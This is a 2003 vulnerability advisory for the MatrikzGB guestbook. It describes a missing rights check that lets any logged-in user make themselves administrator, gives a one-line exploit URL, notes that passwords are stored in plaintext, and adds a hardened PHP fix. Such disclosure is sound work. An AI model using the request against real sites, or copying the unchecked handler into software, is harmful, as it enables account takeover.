
Security hole in MatrikzGB Guestbook                                                                                   

15/8/2003 

 

Vulnerable Versions: 

Version 2.0 and prior 

Version 3   (not tested) 

 

Summary: 

MatrikzGB was written by Thomas Hempel for www.onsite.org.

A bug in index.php allows a user with a regular user account to give administrator rights to himself.

 

Details: 

The bug is in the user edit function: every regular user is allowed to change rights or make any modifications to existing users.

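 // Excerpt from index.php: this runs for any logged-in user, with no check
 // that the caller holds administrator rights.
 if ($new_username != "" && $new_password != "") {
     create_user($new_username, $new_password, $new_rights, $entry_index);
     echo "<tr><th class=\"ok\">Der Benutzer wurde angelegt!"; // "The user has been created!"
 }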

 

Example: 

This is an example of how to give administrator rights to yourself.

http://www.target.com/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass 

 

Comment: 

Once you have administrator rights, you can look up the passwords of all other users; they are in plaintext.
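
A hardened form of the user edit step, covering both the missing rights check described under Details and the plaintext passwords noted above. This is an added example, not MatrikzGB code and not from the advisory's author; authenticate(), save_user(), the $users array layout and the sample accounts are hypothetical and constructed for illustration.

```php
<?php
declare(strict_types=1);

// Constructed user store: passwords are kept as hashes, never as plaintext,
// so an administrator view cannot disclose other users' passwords.
$users = [
    'admin'       => ['hash' => password_hash('admin-secret', PASSWORD_DEFAULT), 'rights' => 'admin'],
    'regularuser' => ['hash' => password_hash('regularpass', PASSWORD_DEFAULT), 'rights' => 'user'],
];

// Returns the caller's account name if the credentials verify, else null.
function authenticate(array $users, string $user, string $pass): ?string
{
    if (!isset($users[$user])) {
        return null;
    }
    return password_verify($pass, $users[$user]['hash']) ? $user : null;
}

// Create or update an account. Whether rights may be set is decided from
// the caller's stored role, never from the request parameters alone.
function save_user(array &$users, ?string $caller, string $name, string $pass, string $rights): bool
{
    if ($caller === null || $name === '' || $pass === '') {
        return false;
    }
    if ($users[$caller]['rights'] !== 'admin') {
        // A regular user may only change their own password.
        if ($name !== $caller) {
            return false;
        }
        // The requested rights value is discarded; the stored role is kept.
        $rights = $users[$caller]['rights'];
    } elseif (!in_array($rights, ['user', 'admin'], true)) {
        return false; // Administrators may only assign known roles.
    }
    $users[$name] = ['hash' => password_hash($pass, PASSWORD_DEFAULT), 'rights' => $rights];
    return true;
}

// The parameters from the advisory's example request, replayed against the
// hardened handler: the password update is accepted, the role stays "user".
$caller = authenticate($users, 'regularuser', 'regularpass');
var_dump(save_user($users, $caller, 'regularuser', 'regularpass', 'admin'));
var_dump($users['regularuser']['rights']);
```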

 

Vendor status: 

Vendor has been contacted. 

 

by Stephan "mastamorphixx" S., member of www.lostkey.org

contact: mastamorphixx@web.de

irc.euirc.de #lostkey

 
